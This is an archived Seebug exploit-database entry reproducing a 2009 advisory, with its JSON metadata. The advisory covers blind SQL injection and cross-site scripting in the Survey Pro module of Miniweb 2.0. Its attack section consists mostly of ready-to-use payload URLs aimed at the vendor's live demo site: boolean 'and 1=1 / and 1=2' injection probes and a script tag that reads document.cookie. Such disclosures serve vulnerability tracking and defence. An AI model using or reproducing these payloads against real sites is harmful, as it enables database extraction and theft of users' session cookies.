ID SSV:14708
Type seebug
Reporter Root
Modified 2009-08-03T00:00:00
Description
No description provided by source.
###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################
==============================================================================
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
==============================================================================
[»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
==============================================================================
[»] Miniweb 2.0 Module Survey Pro (bSQL/XSS) Multiple Remote Vulnerabilities
==============================================================================
[»] Script: [ Miniweb 2.0 ]
[»] Language: [ PHP ]
[»] Download: [ http://www.miniweb2.com/index.php?module=sitebuilder&sitebuilder_id=17 ]
[»] Founder: [ Moudi <m0udi@9.cn> ]
[»] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
[»] Team: [ EvilWay ]
[»] Dork: [ OFF ]
[»] Price: [ $250.00 ]
[»] Site : [ https://security-shell.ws/forum.php ]
###########################################################################
===[ Exploit + LIVE : BLIND SQL INJECTION vulnerability ]===
[»] http://www.site.com/patch/index.php?task=results&campaign_id=[BLIND]
[»] http://miniweb2.com/moduledemo/surveypro/index.php?task=results&campaign_id=1 and 1=1 <= TRUE
[»] http://miniweb2.com/moduledemo/surveypro/index.php?task=results&campaign_id=1 and 1=2 <= FALSE
===[ Exploit XSS + LIVE : vulnerability ]===
[»] http://www.site.com/patch/index.php/[XSS]
[»] http://miniweb2.com/moduledemo/surveypro/index.php/"><script>alert(document.cookie);</script>
Note: have some other XSS on index.php ..
Author: Moudi
###########################################################################
# sebug.net
{"sourceData": "\n ###########################################################################\n#-----------------------------I AM MUSLIM !!------------------------------#\n###########################################################################\n\n==============================================================================\n _ _ _ _ _ _ \n / \\ | | | | / \\ | | | |\n / _ \\ | | | | / _ \\ | |_| |\n / ___ \\ | |___ | |___ / ___ \\ | _ |\n IN THE NAME OF /_/ \\_\\ |_____| |_____| /_/ \\_\\ |_| |_|\n \n\n==============================================================================\n [\u00c2\u00bb] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]\n==============================================================================\n [\u00c2\u00bb] Miniweb 2.0 Module Survey Pro (bSQL/XSS) Multiple Remote Vulnerabilities\n==============================================================================\n\n\t[\u00c2\u00bb] Script: [ Miniweb 2.0 ]\n\t[\u00c2\u00bb] Language: [ PHP ]\n [\u00c2\u00bb] Download: [ http://www.miniweb2.com/index.php?module=sitebuilder&sitebuilder_id=17 ]\n\t[\u00c2\u00bb] Founder: [ Moudi <m0udi@9.cn> ]\n [\u00c2\u00bb] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]\n [\u00c2\u00bb] Team: [ EvilWay ]\n [\u00c2\u00bb] Dork: [ OFF ]\n [\u00c2\u00bb] Price: [ $250.00 ]\n [\u00c2\u00bb] Site : [ https://security-shell.ws/forum.php ]\n\n###########################################################################\n\n===[ Exploit + LIVE : BLIND SQL INJECTION vulnerability ]===\t\n\t\n[\u00c2\u00bb] http://www.site.com/patch/index.php?task=results&campaign_id=[BLIND]\n\n[\u00c2\u00bb] http://miniweb2.com/moduledemo/surveypro/index.php?task=results&campaign_id=1 and 1=1 <= TRUE\n[\u00c2\u00bb] http://miniweb2.com/moduledemo/surveypro/index.php?task=results&campaign_id=1 and 1=2 <= FALSE\n\n===[ Exploit XSS + LIVE : vulnerability ]===\n\n[\u00c2\u00bb] http://www.site.com/patch/index.php/[XSS]\n\n[\u00c2\u00bb] http://miniweb2.com/moduledemo/surveypro/index.php/"><script>alert(document.cookie);</script>\n\nNote: have some other XSS on index.php ..\n\nAuthor: Moudi\n\n###########################################################################\n\n# sebug.net\n\n ", "status": "poc", "description": "No description provided by source.", "sourceHref": "https://www.seebug.org/vuldb/ssvid-14708", "reporter": "Root", "href": "https://www.seebug.org/vuldb/ssvid-14708", "type": "seebug", "viewCount": 2, "references": [], "lastseen": "2017-11-19T18:48:23", "published": "2009-08-03T00:00:00", "cvelist": [], "id": "SSV:14708", "enchantments_done": [], "modified": "2009-08-03T00:00:00", "title": "Miniweb 2.0 Module Survey Pro (bSQL/XSS) Multiple Vulnerabilities", "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": -0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.1}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647628911}}
{}